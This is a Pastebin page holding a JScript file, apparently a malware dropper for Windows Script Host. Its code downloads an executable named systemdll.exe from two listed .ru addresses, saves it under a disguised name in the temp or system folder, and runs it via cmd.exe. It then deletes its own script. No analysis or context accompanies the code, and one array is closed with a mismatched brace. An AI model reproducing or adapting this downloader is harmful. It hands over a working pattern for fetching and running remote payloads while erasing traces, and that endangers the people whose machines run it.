API tools faq
paste
lucifer63

2990.js

lucifer63
Sep 29th, 2016
126
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 2.38 KB | None | 0 0
raw download clone embed print report
  1. function get_system_folder_path(scripting_file_system_object) {
  2.     var system_folder_path = "",
  3.         ws_network_object = WScript["CreateObject"]("WScript.Network");
  4.  
  5.     /*
  6.  
  7.     index=0, WindowsFolder, the windows folder contains files installed by the Windows operating system.
  8.     index=1, SystemFolder, the system folder contains libraries, fonts, and device drivers.
  9.     index=2, TemporaryFolder, the temp folder is used to store temporary files. Its path is found in the TMP environment variable.
  10.  
  11.     */
  12.  
  13.     if (typeof ws_network_object["UserDomain"] == "string") {
  14.         system_folder_path = scripting_file_system_object["GetSpecialFolder"](2);
  15.     } else {
  16.         system_folder_path = scripting_file_system_object["GetSpecialFolder"](1);
  17.     }
  18.  
  19.     return system_folder_path;
  20. }
  21.  
  22. function load_and_execute_file(link_to_file) {
  23.     var WScript = WScript;
  24.     var ActiveXObject = ActiveXObject;
  25.     var msxml2_xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
  26.     var scripting_file_system_object = new ActiveXObject("Scripting.FileSystemObject");
  27.  
  28.     msxml2_xmlhttp["open"]("GET", link_to_file, 0);
  29.  
  30.     try {
  31.         msxml2_xmlhttp.send();
  32.     } catch (error) {
  33.         return false;
  34.     }
  35.  
  36.     if (msxml2_xmlhttp["Status"] == 200) {
  37.         var adodb_stream = new ActiveXObject("ADODB.Stream");
  38.         var masked_file_path = get_system_folder_path(scripting_file_system_object) + "not";
  39.  
  40.         adodb_stream["Open"]();
  41.         adodb_stream["Type"] = 1;
  42.  
  43.         var response_body = msxml2_xmlhttp["ResponseBody"];
  44.  
  45.         adodb_stream["Write"](response_body);
  46.         adodb_stream["Position"] = 0;
  47.         adodb_stream["SaveToFile"](masked_file_path);
  48.         adodb_stream["Close"]();
  49.  
  50.         var command = "cmd.exe /c " + masked_file_path;
  51.         var WScript_shell = new ActiveXObject("Wscript.Shell");
  52.  
  53.         WScript_shell["run"](command, 25);
  54.         scripting_file_system_object["deleteFile"](WScript["ScriptFullName"]);
  55.  
  56.         return true;
  57.     } else {
  58.         return false;
  59.     }
  60.  
  61.     return true;
  62. }
  63.  
  64. if (typeof WScript.Echo == "unknown") {
  65.     var links_to_files = [
  66.         "http://resog.ru/wp-content/plugins/libravatar-replace/systemdll.exe",
  67.         "http://sdng.ru/wp-content/plugins/libravatar-replace/systemdll.exe"
  68.     },
  69.         file_loaded_and_executed = false,
  70.         scripts_to_process = 2,
  71.         scripts_processed = 0;
  72.  
  73.     while (!file_loaded_and_executed) {
  74.         file_loaded_and_executed = load_and_execute_file(links_to_files[scripts_processed]);
  75.  
  76.         scripts_processed++;
  77.  
  78.         if (scripts_processed == scripts_to_process) {
  79.             break;
  80.         }
  81.     }
  82. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!